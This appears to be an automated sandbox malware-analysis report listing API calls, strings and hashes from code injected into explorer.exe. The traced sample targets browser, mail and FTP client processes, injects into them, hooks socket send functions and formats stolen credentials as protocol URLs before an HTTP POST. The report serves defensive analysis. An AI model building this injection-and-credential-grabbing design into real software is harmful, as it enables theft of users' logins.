SHGetSpecialFolderPathW.SHELL32 ref: 000E4971

Part of subcall function 000E1EB4: FindFirstFileW.KERNELBASE ref: 000E1F05

Memory Dump Source

Source File: 00000017.00000002.545405224.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_e1000_explorer.jbxd

Similarity

API ID: FirstProcess32$CloseCreateFileFindFolderHandleNextPathSleepSnapshotSpecialToolhelp32lstrcmpi
String ID:
API String ID: 545558411-0
Opcode ID: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
Instruction ID: e07034320e4124c1100b8544608d92791e203ec77738bbdf640551667e09771c
Opcode Fuzzy Hash: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
Instruction Fuzzy Hash: B131D53160CA488FDB59FF69E8995EE73E2FB98301F10462EE44BD3262DE34994187C0

Function 000E1B74 Relevance: 3.0, APIs: 2, Instructions: 40
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenFileMappingA.KERNEL32 ref: 000E1B8B
MapViewOfFile.KERNEL32 ref: 000E1BAA

Memory Dump Source

Source File: 00000017.00000002.545405224.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_e1000_explorer.jbxd

Similarity

API ID: File$MappingOpenView
String ID:
API String ID: 3439327939-0
Opcode ID: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
Instruction ID: e5abea98356b676f12dbf069f3b67b236b1c676cd93db27c88262866e7ab4d0c
Opcode Fuzzy Hash: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
Instruction Fuzzy Hash: 77F08C34318F094FAB44EF7C9C8C536B7E0EBA8202B008A7EA84AC7164EF34C8808701

Analysis Process: explorer.exePID: 3192, Parent PID: 1244COMMON

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	97.4%
Signature Coverage:	0%
Total number of Nodes:	306
Total number of Limit Nodes:	42

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00081016 Relevance: 87.7, APIs: 30, Strings: 20, Instructions: 244
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00082608: VirtualQuery.KERNEL32(00084434,?,0000001C), ref: 00082615

Part of subcall function 00082861: GetProcessHeap.KERNEL32(00000008,0000A000,000810CC), ref: 00082864
Part of subcall function 00082861: RtlAllocateHeap.NTDLL(00000000), ref: 0008286B

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00081038
RtlMoveMemory.NTDLL(00000000,?,?), ref: 0008106B
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00081074
GetCurrentProcessId.KERNEL32(?,00081010), ref: 0008107A
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000810DF
Process32First.KERNEL32(00000000,?), ref: 000810FE
lstrcmpi.KERNEL32(?,firefox.exe), ref: 0008111A
lstrcmpi.KERNEL32(?,iexplore.exe), ref: 0008112E
lstrcmpi.KERNEL32(?,chrome.exe), ref: 00081142
lstrcmpi.KERNEL32(?,opera.exe), ref: 00081156
lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00081166
lstrcmpi.KERNEL32(?,outlook.exe), ref: 0008117A
lstrcmpi.KERNEL32(?,thebat.exe), ref: 0008118E
lstrcmpi.KERNEL32(?,thebat32.exe), ref: 000811A2
lstrcmpi.KERNEL32(?,thebat64.exe), ref: 000811B6
lstrcmpi.KERNEL32(?,thunderbird.exe), ref: 000811CA
lstrcmpi.KERNEL32(?,filezilla.exe), ref: 000811DE
lstrcmpi.KERNEL32(?,smartftp.exe), ref: 000811F2
lstrcmpi.KERNEL32(?,winscp.exe), ref: 00081206
lstrcmpi.KERNEL32(?,flashfxp.exe), ref: 00081216
lstrcmpi.KERNEL32(?,cuteftppro.exe), ref: 00081226
lstrcmpi.KERNEL32(?,mailmaster.exe), ref: 00081236
lstrcmpi.KERNEL32(?,263em.exe), ref: 00081246
lstrcmpi.KERNEL32(?,foxmail.exe), ref: 00081256
lstrcmpi.KERNEL32(?,alimail.exe), ref: 00081266
lstrcmpi.KERNEL32(?,mailchat.exe), ref: 00081276
lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 000812B4
Process32Next.KERNEL32(00000000,00000128), ref: 0008130B
CloseHandle.KERNELBASE(00000000), ref: 0008131C
Sleep.KERNELBASE(000003E8), ref: 00081327

Strings

263em.exe, xrefs: 0008123C
opera.exe, xrefs: 0008114C
winscp.exe, xrefs: 000811FC
firefox.exe, xrefs: 00081114
mailchat.exe, xrefs: 0008126C
iexplore.exe, xrefs: 00081124
thebat.exe, xrefs: 00081184
thebat64.exe, xrefs: 000811AC
flashfxp.exe, xrefs: 0008120C
alimail.exe, xrefs: 0008125C
smartftp.exe, xrefs: 000811E8
chrome.exe, xrefs: 00081138
thebat32.exe, xrefs: 00081198
cuteftppro.exe, xrefs: 0008121C
mailmaster.exe, xrefs: 0008122C
foxmail.exe, xrefs: 0008124C
thunderbird.exe, xrefs: 000811C0
outlook.exe, xrefs: 00081170
filezilla.exe, xrefs: 000811D4
microsoftedgecp.exe, xrefs: 000810D2, 00081160, 000812AE

Memory Dump Source

Source File: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_81000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
API String ID: 2555639992-1680033604
Opcode ID: f6b0748ffe915788ddbf0a8172041e8907a756ad33ca29f8d35bd18e9fa523b2
Instruction ID: c6fb3a315111370b2d623b8f7e562b9d3a4c86b5ba4b7d63d824c8c2a37431fe
Opcode Fuzzy Hash: f6b0748ffe915788ddbf0a8172041e8907a756ad33ca29f8d35bd18e9fa523b2
Instruction Fuzzy Hash: F9719330604305ABDB50FBB19C49EAE7BECBF85B90B040529FAC1C7191EB75DA068B65

Function 000810A4 Relevance: 80.7, APIs: 26, Strings: 20, Instructions: 203
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00082861: GetProcessHeap.KERNEL32(00000008,0000A000,000810CC), ref: 00082864
Part of subcall function 00082861: RtlAllocateHeap.NTDLL(00000000), ref: 0008286B

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000810DF
Process32First.KERNEL32(00000000,?), ref: 000810FE
lstrcmpi.KERNEL32(?,firefox.exe), ref: 0008111A
lstrcmpi.KERNEL32(?,iexplore.exe), ref: 0008112E
lstrcmpi.KERNEL32(?,chrome.exe), ref: 00081142
lstrcmpi.KERNEL32(?,opera.exe), ref: 00081156
lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00081166
lstrcmpi.KERNEL32(?,outlook.exe), ref: 0008117A
lstrcmpi.KERNEL32(?,thebat.exe), ref: 0008118E
lstrcmpi.KERNEL32(?,thebat32.exe), ref: 000811A2
lstrcmpi.KERNEL32(?,thebat64.exe), ref: 000811B6
lstrcmpi.KERNEL32(?,thunderbird.exe), ref: 000811CA
lstrcmpi.KERNEL32(?,filezilla.exe), ref: 000811DE
lstrcmpi.KERNEL32(?,smartftp.exe), ref: 000811F2
lstrcmpi.KERNEL32(?,winscp.exe), ref: 00081206
lstrcmpi.KERNEL32(?,flashfxp.exe), ref: 00081216
lstrcmpi.KERNEL32(?,cuteftppro.exe), ref: 00081226
lstrcmpi.KERNEL32(?,mailmaster.exe), ref: 00081236
lstrcmpi.KERNEL32(?,263em.exe), ref: 00081246
lstrcmpi.KERNEL32(?,foxmail.exe), ref: 00081256
lstrcmpi.KERNEL32(?,alimail.exe), ref: 00081266
lstrcmpi.KERNEL32(?,mailchat.exe), ref: 00081276
lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 000812B4
Process32Next.KERNEL32(00000000,00000128), ref: 0008130B
CloseHandle.KERNELBASE(00000000), ref: 0008131C
Sleep.KERNELBASE(000003E8), ref: 00081327

Strings

263em.exe, xrefs: 0008123C
opera.exe, xrefs: 0008114C
winscp.exe, xrefs: 000811FC
firefox.exe, xrefs: 00081114
mailchat.exe, xrefs: 0008126C
iexplore.exe, xrefs: 00081124
thebat.exe, xrefs: 00081184
thebat64.exe, xrefs: 000811AC
flashfxp.exe, xrefs: 0008120C
alimail.exe, xrefs: 0008125C
smartftp.exe, xrefs: 000811E8
chrome.exe, xrefs: 00081138
thebat32.exe, xrefs: 00081198
cuteftppro.exe, xrefs: 0008121C
mailmaster.exe, xrefs: 0008122C
foxmail.exe, xrefs: 0008124C
thunderbird.exe, xrefs: 000811C0
outlook.exe, xrefs: 00081170
filezilla.exe, xrefs: 000811D4
microsoftedgecp.exe, xrefs: 000810D2, 00081160, 000812AE

Memory Dump Source

Source File: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_81000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
API String ID: 3950187957-1680033604
Opcode ID: cb2e06b24ee9ee07d08b4b53c66a340f2cdc8c2052ea491795e5298a327fee5c
Instruction ID: 92ea90e728a065c3b10ee3f836ed5eb5e8a8dda0ab9d7eab971388ade25db994
Opcode Fuzzy Hash: cb2e06b24ee9ee07d08b4b53c66a340f2cdc8c2052ea491795e5298a327fee5c
Instruction Fuzzy Hash: 79517270604305A7DB50FBB18C85EAF7AECBF85B90B040939FAC1D6081EB64DA068B75

Function 00087728 Relevance: 6.2, APIs: 4, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000018.00000002.605262132.0000000000086000.00000040.80000000.00040000.00000000.sdmp, Offset: 00086000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_86000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c5445227933b7c7884a948d87e6e6edbd1f0b00d7431add8d286fe8315b697d
Instruction ID: 9b19febec4c14d8985e07823db6ea8ccfd6019d3ec10bd7ab69b27837b6b85f3
Opcode Fuzzy Hash: 3c5445227933b7c7884a948d87e6e6edbd1f0b00d7431add8d286fe8315b697d
Instruction Fuzzy Hash: FF512B7194C3918FD722AA78CC847B57BE0FB52320B390679C5E9CB3CAEB949805C761

Function 00082861 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,0000A000,000810CC), ref: 00082864
RtlAllocateHeap.NTDLL(00000000), ref: 0008286B

Memory Dump Source

Source File: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_81000_explorer.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: dd8bd5360c9c98a9841e087fd6d4da07649c860a1a6323a56136c81b20943975
Instruction ID: 77588290d4e37ef700697110175aaff6c1c57f9cd16726c1ee75de6bd7924a5a
Opcode Fuzzy Hash: dd8bd5360c9c98a9841e087fd6d4da07649c860a1a6323a56136c81b20943975
Instruction Fuzzy Hash: 8CA002715502507FFD4557A4FD1DF557A19B7C5B11F0045447189C50609968554C9F21

Non-executed Functions

Function 00081819 Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 208
injectionnativesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00082608: VirtualQuery.KERNEL32(00084434,?,0000001C), ref: 00082615

OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,756F3E2E,microsoftedgecp.exe,?), ref: 0008184E
NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00081889
NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00081919
RtlMoveMemory.NTDLL(00000000,00083428,00000016), ref: 00081940
RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00081968
NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00081978
CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00081992
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 0008199A
CloseHandle.KERNEL32(00000000), ref: 000819A8
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 000819AF
GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 000819C5
GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 000819CC
ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000819E2
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081A0C
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00081A1F
CloseHandle.KERNEL32(00000000), ref: 00081A26
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00081A2D
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081A41
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00081A58
CloseHandle.KERNEL32(00000000), ref: 00081A65
CloseHandle.KERNEL32(?), ref: 00081A6B
CloseHandle.KERNEL32(?), ref: 00081A71
CloseHandle.KERNEL32(00000000), ref: 00081A74

Strings

ntdll, xrefs: 000819C0
opera_shared_counter, xrefs: 0008198B
microsoftedgecp.exe, xrefs: 0008181D
atan, xrefs: 000819BB

Memory Dump Source

Source File: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_81000_explorer.jbxd

Yara matches

Similarity

API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
String ID: atan$microsoftedgecp.exe$ntdll$opera_shared_counter
API String ID: 1066286714-4141090125
Opcode ID: b93d06834f6a1b31c03425c76c15e44102fa25189e47d0077c7e9fd67a3e8666
Instruction ID: 9f5633c6449d72ef76d13a6fe6a98af6d308b0c36e19ae64f2dd6a10d85f2928
Opcode Fuzzy Hash: b93d06834f6a1b31c03425c76c15e44102fa25189e47d0077c7e9fd67a3e8666
Instruction Fuzzy Hash: 47618E31105304AFE710EF65DC84EABBBECFF89B54F000519F989D6291DA74DA058B62

Function 0008263E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68
encryptionstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0008265A
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00082672
lstrlen.KERNEL32(?,00000000), ref: 0008267A
CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00082685
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0008269F
wsprintfA.USER32 ref: 000826B6
CryptDestroyHash.ADVAPI32(?), ref: 000826CF
CryptReleaseContext.ADVAPI32(?,00000000), ref: 000826D9

Strings

%02X, xrefs: 000826B0

Memory Dump Source

Source File: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_81000_explorer.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
String ID: %02X
API String ID: 3341110664-436463671
Opcode ID: fc706adbc229e9871d075a65bcf97a68664b66aeeab1e926bd154e23bee0acba
Instruction ID: 6f7decda94893415d9c613d86727ea4291130fd5527fc19c423d8df5fa7bf1f8
Opcode Fuzzy Hash: fc706adbc229e9871d075a65bcf97a68664b66aeeab1e926bd154e23bee0acba
Instruction Fuzzy Hash: D51128B1A00108BFEB119B95EC98EAEBFBCFB88B41F104065F645E2160D6758F119B60

Function 00081332 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 94
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00082861: GetProcessHeap.KERNEL32(00000008,0000A000,000810CC), ref: 00082864
Part of subcall function 00082861: RtlAllocateHeap.NTDLL(00000000), ref: 0008286B

GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,0008109E,?,00081010), ref: 0008134A
GetCurrentProcessId.KERNEL32(00000003,?,0008109E,?,00081010), ref: 0008135B
wsprintfA.USER32 ref: 00081372

Part of subcall function 0008263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0008265A
Part of subcall function 0008263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00082672
Part of subcall function 0008263E: lstrlen.KERNEL32(?,00000000), ref: 0008267A
Part of subcall function 0008263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00082685
Part of subcall function 0008263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0008269F
Part of subcall function 0008263E: wsprintfA.USER32 ref: 000826B6
Part of subcall function 0008263E: CryptDestroyHash.ADVAPI32(?), ref: 000826CF
Part of subcall function 0008263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 000826D9

CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00081389
GetLastError.KERNEL32 ref: 0008138F
Sleep.KERNEL32(000001F4), ref: 000813A1

Part of subcall function 000824D5: GetCurrentProcessId.KERNEL32 ref: 000824E7
Part of subcall function 000824D5: GetCurrentThreadId.KERNEL32 ref: 000824EF
Part of subcall function 000824D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000824FF
Part of subcall function 000824D5: Thread32First.KERNEL32(00000000,0000001C), ref: 0008250D
Part of subcall function 000824D5: CloseHandle.KERNEL32(00000000), ref: 00082566

GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 000813B8
GetProcAddress.KERNEL32(00000000), ref: 000813BF
GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 000813E4
GetProcAddress.KERNEL32(00000000), ref: 000813EB

Part of subcall function 00081DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00081E1D

RtlExitUserThread.NTDLL(00000000), ref: 0008141D

Strings

%s%d%d%d, xrefs: 0008136C
ws2_32.dll, xrefs: 000813B3, 000813DF
send, xrefs: 000813AE
WSASend, xrefs: 000813DA

Memory Dump Source

Source File: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_81000_explorer.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
String ID: %s%d%d%d$WSASend$send$ws2_32.dll
API String ID: 706757162-1430290102
Opcode ID: 4fec015cbb2ac13bf4a1c12d5512f26f0fe35a9b684991f6ddbd7004c2ccbf0f
Instruction ID: e1150cd2257c806cacc2476d6baa2bc67bd95f910a78fb5d1cafcba5e1534409
Opcode Fuzzy Hash: 4fec015cbb2ac13bf4a1c12d5512f26f0fe35a9b684991f6ddbd7004c2ccbf0f
Instruction Fuzzy Hash: 1D317531340615BBDF107FA0DC1ABDE3B59BF95F41F005014FAC69A292CF799A528BA1

Function 00081647 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91
stringnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlen.KERNEL32(00084220,?,?), ref: 00081679
lstrlen.KERNEL32(?), ref: 00081686
getpeername.WS2_32(?,?,?), ref: 000816A0
inet_ntoa.WS2_32(?), ref: 000816B1
htons.WS2_32(?), ref: 000816BF
wsprintfA.USER32 ref: 00081725

Strings

pop3://%s:%s@%s:%d, xrefs: 00081701
ftp://%s:%s@%s:%d, xrefs: 00081708
smtp://%s:%s@%s:%d, xrefs: 000816F3, 00081723
imap://%s:%s@%s:%d, xrefs: 000816FA

Memory Dump Source

Source File: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_81000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
API String ID: 3379139566-1703351401
Opcode ID: 03f0530a0a7ee1c63c3f1577a01795ef3f55d768128e7972553bc29af73dd61b
Instruction ID: d5608456101c3c778587acf2e152922007bce819ecc53712541b90b68493945c
Opcode Fuzzy Hash: 03f0530a0a7ee1c63c3f1577a01795ef3f55d768128e7972553bc29af73dd61b
Instruction Fuzzy Hash: 97219236E04209ABAF517EA9CD885FE7AFDBF85701F084179E9C4D3211DA34CE129B64

Function 00081752 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,00081539,?,?,?,0008144B,?), ref: 00081763
GetProcAddress.KERNEL32(00000000,?,00081539,?,?,?,0008144B,?), ref: 0008176A
RtlZeroMemory.NTDLL(00084228,00000104), ref: 00081788
RtlZeroMemory.NTDLL(00084118,00000104), ref: 00081790
RtlZeroMemory.NTDLL(00084330,00000104), ref: 00081798
RtlZeroMemory.NTDLL(00084000,00000104), ref: 000817A1

Strings

%s%s%s%s, xrefs: 000817B3
sscanf, xrefs: 00081755
ntdll.dll, xrefs: 0008175A

Memory Dump Source

Source File: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_81000_explorer.jbxd

Yara matches

Similarity

API ID: MemoryZero$AddressHandleModuleProc
String ID: %s%s%s%s$ntdll.dll$sscanf
API String ID: 1490332519-278825019
Opcode ID: 0d8de067e37a3c8e510e18b4f3f54e50335b4ff64490c8f9c8ca228bf60caefa
Instruction ID: 530bc9f54433c06892bab1a68e75f7d045b8179b057df917c1f81b95164fa071
Opcode Fuzzy Hash: 0d8de067e37a3c8e510e18b4f3f54e50335b4ff64490c8f9c8ca228bf60caefa
Instruction Fuzzy Hash: 29F0823278032D33852032EABC0AD4BBE5CFBD1FA63420161B7C4AB281D8996A004BF4

Function 000824D5 Relevance: 15.1, APIs: 10, Instructions: 51
threadprocessinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 000824E7
GetCurrentThreadId.KERNEL32 ref: 000824EF
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000824FF
Thread32First.KERNEL32(00000000,0000001C), ref: 0008250D
OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0008252C
SuspendThread.KERNEL32(00000000), ref: 0008253C
CloseHandle.KERNEL32(00000000), ref: 0008254B
Thread32Next.KERNEL32(00000000,0000001C), ref: 0008255B
CloseHandle.KERNEL32(00000000), ref: 00082566

Memory Dump Source

Source File: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_81000_explorer.jbxd

Yara matches

Similarity

API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
String ID:
API String ID: 1467098526-0
Opcode ID: 13e0c775c2527d4a5f09ea347ca2aaf5247988b557232a428c51b9325d28ed3b
Instruction ID: fb39f373af59805266f910fafb1a5732cded0f9030e1640caf296d2c8af7054c
Opcode Fuzzy Hash: 13e0c775c2527d4a5f09ea347ca2aaf5247988b557232a428c51b9325d28ed3b
Instruction Fuzzy Hash: B9118EB1044700EFE710AF60AC2CB6EBBA8FFC5B01F000529FAC192150D7399A498FA7

Function 00081F4A Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00082861: GetProcessHeap.KERNEL32(00000008,0000A000,000810CC), ref: 00082864
Part of subcall function 00082861: RtlAllocateHeap.NTDLL(00000000), ref: 0008286B

Part of subcall function 000827E2: lstrlen.KERNEL32(000840DA,?,00000000,00000000,00081F86,75712B62,000840DA,00000000), ref: 000827EA
Part of subcall function 000827E2: MultiByteToWideChar.KERNEL32(00000000,00000000,000840DA,00000001,00000000,00000000), ref: 000827FC

Part of subcall function 00082374: RtlZeroMemory.NTDLL(?,00000018), ref: 00082386

RtlZeroMemory.NTDLL(?,0000003C), ref: 00081FE2
wsprintfW.USER32 ref: 0008211B
wsprintfW.USER32 ref: 00082186
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00082250

Strings

POST, xrefs: 000820CC
Host: %s, xrefs: 00082180
Accept: */*Referer: %S, xrefs: 00082111
Content-Type: application/x-www-form-urlencoded, xrefs: 000821AA

Memory Dump Source

Source File: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_81000_explorer.jbxd

Yara matches

Similarity

API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
API String ID: 4204651544-1701262698
Opcode ID: e48be7de1766242c5f44ab3653c0dcb4d8e3a1e436a386c2fadcbc51b9c6efee
Instruction ID: 255fa56fcf304d2d87e24e71b666508560c75d90a8d3bc13f7fa8d1b7e7ffd1a
Opcode Fuzzy Hash: e48be7de1766242c5f44ab3653c0dcb4d8e3a1e436a386c2fadcbc51b9c6efee
Instruction Fuzzy Hash: A9A17E71609305AFD750EFA8C885A6BBBE8FF88740F10092DF9C5D7252DA74DE048B52

Function 000825AD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(00000400,00000000,?,756F3E2E,?,?,microsoftedgecp.exe,00081287), ref: 000825BF
IsWow64Process.KERNEL32(000000FF,?), ref: 000825D1
IsWow64Process.KERNEL32(00000000,?), ref: 000825E4
CloseHandle.KERNEL32(00000000), ref: 000825FA

Strings

microsoftedgecp.exe, xrefs: 000825AD

Memory Dump Source

Source File: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_81000_explorer.jbxd

Yara matches

Similarity

API ID: Process$Wow64$CloseHandleOpen
String ID: microsoftedgecp.exe
API String ID: 331459951-1475183003
Opcode ID: 600cb7db61868d3c752ed1014d4c81f2ed1500a3007f689a1d6809e9e32329e4
Instruction ID: 3f0c6239a235d8a9353f50cbffe2d8c9637570955e109b19aea4602d3b8e1d07
Opcode Fuzzy Hash: 600cb7db61868d3c752ed1014d4c81f2ed1500a3007f689a1d6809e9e32329e4
Instruction Fuzzy Hash: C8F03071942A18FFAB10DF949E988EE77ACFB01655B14026AF954A2140DB354F04EBA0

Function 00081B17 Relevance: 6.1, APIs: 4, Instructions: 101
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlMoveMemory.NTDLL(?,?,?), ref: 00081B4E
LoadLibraryA.KERNEL32(?), ref: 00081B76
GetProcAddress.KERNEL32(00000000,-00000002,?,?,00000001,?,00000000), ref: 00081BA3
LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00081BF4

Memory Dump Source

Source File: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_81000_explorer.jbxd

Yara matches

Similarity

API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
String ID:
API String ID: 3827878703-0
